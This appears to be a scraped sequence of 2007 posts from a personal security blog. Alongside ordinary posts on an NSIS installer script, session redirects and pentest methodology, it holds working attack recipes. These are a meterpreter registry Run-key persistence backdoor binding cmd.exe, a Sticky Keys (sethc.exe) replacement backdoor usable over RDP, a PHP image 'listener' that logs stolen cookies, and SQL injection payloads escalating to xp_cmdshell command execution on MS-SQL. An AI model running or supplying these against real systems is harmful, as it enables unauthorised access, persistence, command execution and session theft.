href="http://nsis.sourceforge.net/mediawiki/images/9/9d/Untgz.zip">[installer]</a> - Decompression library<br /><br />Files to Distrubute:<br />compressed_1.tar<br />-- decomp_set1of5_file1of2.txt<br />-- decomp_set1of5_file2of2.txt<br />compressed_2.tar<br />-- decomp_set2of5_file1of3.txt<br />-- decomp_set2of5_file2of3.txt<br />-- decomp_set2of5_file3of3.txt<br />compressed_3.tar<br />-- decomp_set3of5_file1of2.txt<br />-- decomp_set3of5_file2of2.txt<br />compressed_4.tar<br />-- decomp_set4of5_file1of1.txt<br />compressed_5.tar<br />-- decomp_set5of5_file1of3.txt<br />-- decomp_set5of5_file2of3.txt<br />-- decomp_set5of5_file3of3.txt<br /><br /><div id="code"><font color="#7f7f7f" face="Times" size="3">1 <br />2 <br />3 <font color="#0000ff" face="Times">!include </font><font color="blue" face="Times">LogicLib.nsh </font><br />4 <br />5 <font color="blue" face="Times">Function .onInit</font><br />6 </font><font color="#007f00" face="Times" size="3"># Section Size must be manually set to the size of the required disk space NSIS will not do this for external files.</font><font color="#7f7f7f" face="Times" size="3"><br />7 </font><font color="#007f00" face="Times" size="3"># set required size of section number of kilobytes</font><font color="#7f7f7f" face="Times" size="3"><br />8 </font><font color="#007f00" face="Times" size="3"># 8gb to kilo bytes = 8,388,608</font><font color="#7f7f7f" face="Times" size="3"><br />9 </font><font face="Times" size="3">SectionSetSize <font color="#ff7f00" face="Times">${SecDecompress} </font><font color="#ff0000" face="Times">8388608</font></font><font color="#7f7f7f" face="Times" size="3"><br />10 <br />11</font><font color="#007f00" face="Times" size="3">;compressed_#.taz has be in the same directory as the Setup file.</font><font color="#7f7f7f" face="Times" size="3"><br />12</font><font color="#ff7f00" face="Times" size="3">${If} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$EXEDIR<font color="#7f7f7f" face="Times">\compressed_1.tar"</font></font><font color="#7f7f7f" face="Times" size="3"><br />13</font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$EXEDIR<font color="#7f7f7f" face="Times">\compressed_2.tar"</font></font><font color="#7f7f7f" face="Times" size="3"><br />14</font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$EXEDIR<font color="#7f7f7f" face="Times">\compressed_3.tar"</font></font><font color="#7f7f7f" face="Times" size="3"><br />15 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$EXEDIR<font color="#7f7f7f" face="Times">\compressed_4.tar"</font></font><font color="#7f7f7f" face="Times" size="3"><br />16 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$EXEDIR<font color="#7f7f7f" face="Times">\compressed_5.tar"</font></font><font color="#7f7f7f" face="Times" size="3"><br />17 </font><font color="#0000ff" face="Times" size="3">Return</font><font color="#7f7f7f" face="Times" size="3"><br />18 </font><font color="#ff7f00" face="Times" size="3">${Else}</font><font color="#7f7f7f" face="Times" size="3"><br />19 </font><font color="#0000ff" face="Times" size="3">MessageBox <font color="#ff0000" face="Times">MB_OK</font><font color="blue" face="Times">|</font><font color="#ff0000" face="Times">MB_ICONINFORMATION </font><font color="#7f7f7f" face="Times">"This copy of the installer is missing a </font></font><font color="#7f7f7f" face="Times" size="3">compressed#.tar file.." <font color="#ff0000" face="Times">IDOK </font><font color="blue" face="Times">abort</font><br />20 </font><font face="Times" size="3">abort:</font><font color="#7f7f7f" face="Times" size="3"><br />21 </font><font face="Times" size="3">Banner::destroy</font><font color="#7f7f7f" face="Times" size="3"><br />22 </font><font color="#0000ff" face="Times" size="3">Abort</font><font color="#7f7f7f" face="Times" size="3"><br />23 </font><font color="#ff7f00" face="Times" size="3">${EndIf}</font><font color="#7f7f7f" face="Times" size="3"><br />24 <br />25 <font color="blue" face="Times">FunctionEnd</font><br />26 <br />27 <font color="#0000ff" face="Times">Section </font><font color="blue" face="Times">-decompress SecDecompress</font><br />28 <br />29 </font><font color="#007f00" face="Times" size="3">;UnTGZ Plugin</font><font color="#7f7f7f" face="Times" size="3"><br />30 </font><font color="#007f00" face="Times" size="3">;compressed_#.tar in this example is not compressed by gzip just tar collection </font><font color="#7f7f7f" face="Times" size="3"><br />31 </font><font color="#007f00" face="Times" size="3">; untgz plugin requires -znone to denote this</font><font color="#7f7f7f" face="Times" size="3"><br />32 <br />33 <font color="blue" face="Times">untgz::extract -j -d </font>"<font color="#ff7f00" face="Times">$INSTDIR</font>\" <font color="blue" face="Times">-znone</font>"<font color="#ff7f00" face="Times">$EXEDIR</font>\compressed_1.tar"<br />34 </font><font color="#ff7f00" face="Times" size="3">${If}${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set1of5_file1of2.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />35 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set1of5_file2of2.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />36 <font color="blue" face="Times">untgz::extract -j -d </font>"<font color="#ff7f00" face="Times">$INSTDIR</font>\" <font color="blue" face="Times">-znone</font>"<font color="#ff7f00" face="Times">$EXEDIR</font>\compressed_2.tar"<br />37 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set2of5_file1of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />38 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set2of5_file2of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />39 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set2of5_file3of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />40 <font color="blue" face="Times">untgz::extract -j -d </font>"<font color="#ff7f00" face="Times">$INSTDIR</font>\" <font color="blue" face="Times">-znone</font>"<font color="#ff7f00" face="Times">$EXEDIR</font>\compressed_3.tar"<br />41 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set3of5_file1of2.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />42 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set3of5_file2of2.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />43 <font color="blue" face="Times">untgz::extract -j -d </font>"<font color="#ff7f00" face="Times">$INSTDIR</font>\" <font color="blue" face="Times">-znone</font>"<font color="#ff7f00" face="Times">$EXEDIR</font>\compressed_4.tar"<br />44 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set4of5_file1of1.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />45 <font color="blue" face="Times">untgz::extract -j -d </font>"<font color="#ff7f00" face="Times">$INSTDIR</font>\" <font color="blue" face="Times">-znone</font>"<font color="#ff7f00" face="Times">$EXEDIR</font>\compressed_5.tar"<br />46 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set5of5_file1of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />47 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set5of5_file2of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />48 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set5of5_file3of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />49 </font><font color="#0000ff" face="Times" size="3">Goto <font color="blue" face="Times">EverythingOk</font></font><font color="#7f7f7f" face="Times" size="3"><br />50 </font><font color="#ff7f00" face="Times" size="3">${Else}</font><font color="#7f7f7f" face="Times" size="3"><br />51 <font color="#0000ff" face="Times">MessageBox </font><font color="#ff0000" face="Times">MB_OK</font><font color="blue" face="Times">|</font><font color="#ff0000" face="Times">MB_ICONEXCLAMATION </font>"Installation Failure. Media may be corrupt." <font color="#ff0000" face="Times">IDOK</font></font><font face="Times" size="3">abort</font><font color="#7f7f7f" face="Times" size="3"><br />52 </font><font face="Times" size="3">abort:</font><font color="#7f7f7f" face="Times" size="3"><br />53 </font><font face="Times" size="3">Banner::destroy</font><br /><font color="#7f7f7f" face="Times" size="3">54 </font><font color="#0000ff" face="Times" size="3">Abort</font><font color="#7f7f7f" face="Times" size="3"><br />55 </font><font color="#ff7f00" face="Times" size="3">${EndIf}</font><font color="#7f7f7f" face="Times" size="3"><br />56 </font><font face="Times" size="3">EverythingOK:</font><font color="#7f7f7f" face="Times" size="3"><br />57 <br />58 </font><font color="#007f00" face="Times" size="3">;If tar files were packaged into the setup you can delete it like this :)</font><font color="#7f7f7f" face="Times" size="3"><br />59 </font><font color="#007f00" face="Times" size="3">;Delete "$INSTDIR\compressed#.taz"</font><font color="#7f7f7f" face="Times" size="3"><br />60 <br />61 <font color="#0000ff" face="Times">SectionEnd</font></font><br /></div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.comtag:blogger.com,1999:blog-26418619.post-77779462824172818272007-04-03T16:03:00.000+00:002007-04-03T19:30:40.413+00:00Session redirect in php and aspThese are examples of correct ways to handle access and redirects in sessions in asp(1.0|vbs) & php.. I dont know how may times I see this done wrong.. <br /><span style="font-weight:bold;"><br />ASP example</span><br /><div id="code"><%<br />If NOT Session("Authenticated") = 1 Then<br /> Response.Redirect ("login.asp")<br /> 'Response.Redirect ("login.asp", true); '<= This is the same as the default<br /> 'Exit ' <= This is called with default True statemens as above<br />End If<br />%></div><br /><br /><br /><span style="font-weight:bold;">PHP Example</span><br /><div id="code"><?PHP<br /> if ($_SESSION['access'] != "yes")<br /> { header(Location:login.php); /* Redirect browser */<br /> exit; /* Make sure that code below does not get executed when we redirect. */<br /> }<br /> //Code Following Should not be executed unless authenticated.<br /> echo ("secure code");<br />?></div><br /><br />Note: Since PHP 4.4.2 and PHP 5.1.2 this function prevents more than one header <br />to be sent at once as a protection against header injection attacks.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com2tag:blogger.com,1999:blog-26418619.post-83223673652757126612007-03-30T20:52:00.000+00:002007-05-14T13:52:58.154+00:00Month of ... bugs1. Month of browser bugs<br />2. Month of apple bugs<br />3. Month of kernel bugs<br />4. Month of PHP bugs<br />5. Month of MySPACE bugs<br /><br />eh.. ergg.. cough.. die. this fad is getting old.. I hate even commenting on this at all.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com1tag:blogger.com,1999:blog-26418619.post-40737548889802539912007-03-28T22:09:00.000+00:002007-04-03T14:55:05.527+00:00Setting and Confirming reg keys w/meterpreter.super quick meterpreter sequence<br />Prep<br /><div id="code">upload c:\\sbdbg.exe c:\\windows\\system32\\</div><br /><br />Set<br /><div id="code">reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbd.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"</div><br /><br />Verify<br /><div id="code">reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<br />reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor</div><br /><br />Use<br /><div id="code">(reboot)</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-85345353939087061662007-03-23T05:16:00.000+00:002007-03-23T05:34:56.915+00:00Comparing Common Vulnerability Result SetsOne of the major things I've been working on is bring together vulnerability result information. I found that it was a major pain in ass to be able to remove duplicate entries from result sets. I was finally able to come up with listing for based on CVE / BID tracking numbers:<br /><br />An example corresponding file could be something like this<br /><br />Tenable Nessus 3.0 - to - Harris Guardian Scanner <a href="http://shadowbq.googlepages.com/Nessus_to_Harris.txt">[download txt]</a><br /><br />Just extracting Nessus Information can be a huge problem. Because of the lack of structure within the nasl scripting language, there are many many variations on the output generated by the plugins. I've made some additional changes to an old tool.<br /><br />nessus_extract.pl (version 1.7) <a href="http://www.answorld.com/nessus_extract.pl">[download perl]</a><br /><br />I added pipes into the fray, generating a recursive style csv to separate BID and CVE numbers as well as a more robust double-quote word qualifier. <br /><br />One huge help is the Open Source Vulnerability Data Base (osvdb) which has come a long way.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com1tag:blogger.com,1999:blog-26418619.post-88814600138431060002007-03-15T21:06:00.001+00:002007-03-23T04:10:52.041+00:00Pentest Order of Objects..ISSAF was used in conjuction with the latest backtrack release.<br />Although it is not my company's standard it is quite close.<br /><br />Not to be too open.. but this has lead to a really good idea for object orient coding.<br /><br />Information Systems Security Assessment Framework (ISSAF) draft 0.2<br /><span style="font-weight: bold;">ASSESSMENT </span><br /><br /><span style="font-style: italic;">INFORMATION GATHERING </span><br />-Archive<br /> -DNS<br /> -Route<br /> -SMTP<br /> -Searchengine<br /> -Survey<br /> -Whois<br /><span style="font-style: italic;">NETWORK MAPPING</span><br /> -Identify Live Hosts<br /> -OS-Fingerprinting<br /> -Portscanning<br /> -Service Fingerprinting<br /> -Identify Border Assets<br /> -(SNMP - MIB Browsing)<br /> -(VPN)<br /> -Web/Public Application Mapping(Crawling)<br /><span style="font-style: italic;">VULNERABILITY IDENTIFICATION </span><br /> -(Cisco)<br /> -Database<br /> -Fuzzers<br /> -SMB Analysis<br /> -SNMP Analysis<br /> -Security Scanner<br /> -Web Analysis<br /><span style="font-style: italic;">PENETRATION </span><br />-Exploits (metasploit)<br /><span>-Exploits (CoreImpact / Canvas)<br />-Exploits (milworm /secfocus)</span><span style="font-style: italic;"><br />GAINING ACCESS AND PRIVILEGE ESCALATION </span><br /> -Password Attacks<br /> -Default Conf Attacks<br /> -Sniffers<br /> -Spoofing<br /><span style="font-style: italic;">ENUMERATING FURTHER </span><br />-Management Infrastructure (ie. WMI,SNMP,CDP)<br /> -Pull Passwords (hashes, SAM FILES)<br /> -Priviledged Assessment(Repeat all Steps)<br /><span style="font-style: italic;">COMPROMISE REMOTE USERS/SITES</span><br />-Targeted Phishing<br /> -DNS Poisoning<br /><span style="font-style: italic;">MAINTAINING ACCESS</span><br /> -Covert Channels<br />-Rootkits<br /> -Portknocking<br />-Proxy<br /> -Tunnels<br />COVER THE TRACKS<br />-House Cleaningshadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com2tag:blogger.com,1999:blog-26418619.post-54491630490275782642007-03-13T15:51:00.001+00:002007-03-15T19:57:54.470+00:00SBD as netcat<div xmlns='http://www.w3.org/1999/xhtml'>Yeah so I rattle off some SBD stuff sometimes.. Im referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor located @ <a href='http://tigerteam.se/dl/sbd/'>http://tigerteam.se/dl/sbd/</a>. This is my perferred "swiss army knife" because of its default configuration of encryption(AES-CBC-128 + HMAC-SHA1 encryption) and dangerous execution binding (-e command). <br></br><br></br>Netcat and its NC Clones:<br></br><ul><li>netcat - "swiss army knife"</li><li><a href='http://tigerteam.se/dl/sbd/'>sbd & sbdbg.exe</a> - shadowinteger's backdoor</li><li><a href='http://www.deepspace6.net/projects/netcat6.html'>netcat6</a> - swiss army knife+ for ipv6 </li><li><a href='http://www.farm9.org/Cryptcat/'>cryptcat</a> - netcat with twofish encryption</li><li><a href='http://www.dest-unreach.org/socat/'>socat</a> - Multipurpose relay(netcat++) IPV6/SSL Example usage: <br>socat TCP6-LISTEN:8080,reuseaddr,fork PROXY: proxy:www.domain.com:80 </li></li><br /></ul>Simpler tools:<br><ul><li><a href='http://xfocus.net/tools/200601/nc.pl'>nc.pl</a> - perl netcat-like implementation</li><li><a href='http://www-user.tu-chemnitz.de/%7Euro/software/netcopy/netcopy.c'>netcopy</a> - reciever<br></br></li><li><a href='http://www-user.tu-chemnitz.de/%7Euro/software/netcopy/netsend.c'>netsend</a> - transmitter for netcopy</li><li><a href='http://www-user.tu-chemnitz.de/%7Euro/software/netcopy/urocat.c'>urocat</a> - simple cat clone <br></br></li></ul>None of this is news.. I just wanted to point out some of this simple stuff.</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.comtag:blogger.com,1999:blog-26418619.post-56990270141027631302007-03-08T19:57:00.001+00:002007-03-12T15:03:27.043+00:00sbd fun as a rookit via sethc.exe<span style="font-weight:bold;">SBD Fun</span><br /><br />Transfering files<br /><div id="code">RCV: sbd -l -p 4337 > outputfile<br />XMIT: cat infile | sbd 127.0.0.1 4337 –q 10</div><br /><br />Transfering files through .tar.gz<br /><div id="code">RCV: sbd -l -p 4337 | tar xvfpz –<br />XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337</div><br /><br />PORT Scan: <br /><div id="code">echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000</div><br /><br /><span style="font-weight:bold;">Using Cmd.exe to bind to service</span><br />In my experience this is flaky at best.. <br /><br />create then start service:<br /><div id="code">sc create testsvc binpath= "cmd /K start" type= interact<br />sc start testsvc</div><br /><br />Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).<br /><br />SCM starts a service<br />RegisterServiceCtrlHandler API<br /><br />We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.<br /><br /><span style="font-weight:bold;">Simple C++ sbd wrapper</span><br />(Rename sbdbg.exe to svchost in this example.)<br /><div id="code">#include <cstdlib><br />#include <iostream><br /><br />using namespace std;<br /><br />int main(int argc, char *argv[])<br />{<br /> // Lets restrict address to localhost only.. pls.<br /> system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");<br /> return EXIT_SUCCESS;<br />}</div><br /><br /><span style="font-weight:bold;">Rootkit portion</span><br />Rename output binary to sethc.exe .. works ok.<br /><br /><span style="font-weight:bold;">Prefetch restrictions.</span><br />Remember to delete any exisiting sethc.exe files in c:\windows\prefetch prior to use. <br /><br /><span style="font-weight:bold;">Interesting Note about RDC</span><br />Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.<br /><br /><span style="font-weight:bold;">Apparently the SYSTEM Kernel security shuts down all unknown process on sweep @5 minutes into session.</span><br /><br />Can there fake handler for WM_CLOSE? or terminate...shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-15122506786060477352007-03-07T20:52:00.000+00:002007-03-07T21:16:23.795+00:00PNG Listener w/loggerThis is an example of a simple PNG listener with a logging mechanism.<br />(Do I really have to explain how to use this?)<br /><br /><div id="code"><?php <br />$cookie = $_GET["c"]; <br />if ($cookie == "init")<br />{$file = fopen('001.txt', 'w');<br />fwrite($file, ":: 00* Logger:: \n");<br />}<br />else{<br />$file = fopen('001.txt', 'a'); <br />fwrite($file, $_SERVER['REMOTE_ADDR']."=>".$cookie . "\n");<br />} <br />header("Content-type: image/png");<br />$im = imageCreate(1,1);<br />$background = imageColorAllocate($im, 255, 255, 255);<br />imagePNG($im);<br />imageDestroy($im);<br />}<br />?></div><br /><br />I developed this snippet while working on a solution for browser history leaks.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-53861632581172775932007-03-07T16:20:00.000+00:002007-03-07T17:04:34.810+00:00SQL injection and identification<span style="font-weight:bold;">Identify sql Server through Blind SQL injection </span><br /><br />http://example.com/index.php?some_var=1/*!40017%20s*/ <br /><br />MySQL is at least 4.0.17 if you get a different result.<br /><br />## String based (concat ||) ==> PostgreSQL, Oracle<br />## String based (concat +) ==> MS-SQL, MS-Access<br /><br /><span style="font-weight:bold;">Normal Union attack</span><br /><div id="code">$var$quote_type AND 1=1;--<br />$var$quote_type AND 1=0;--<br />$var$quote_type union all select $select_statement where 1=0;--<br />$var$quote_type AND 1=0 union all select $select_statement;--<br />$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--</div><br /><br /><span style="font-weight:bold;">MS-SQL</span><br /><br />Check if we are admins<br /><div id="code">IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))</div><br /><br />Check things like<br />MSSQL_OPENQUERY<br /><div id="code">(select 1 from OPENQUERY([$servername],'select 1'))</div><br /><br />MSSQL_OPENROWSET<br /><div id="code">(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))</div><br />or<br /><div id="code">(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))</div><br /><br />If we have a linked server and sa<br /><div id="code">select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')<br />select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')<br />select count(*) from TMP_TMP<br />select 1 where 1=(select cmd from TMP_TMP where id=7)<br />select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')</div><br />If already sa<br /><div id="code">select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')<br />select * from OPENROWSET('SQLOLEDB','';;,'select @@version')</div> <br />Other things todo<br /><div id="code">select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')<br />select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')<br />select * from master..TMP_TMP<br />select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0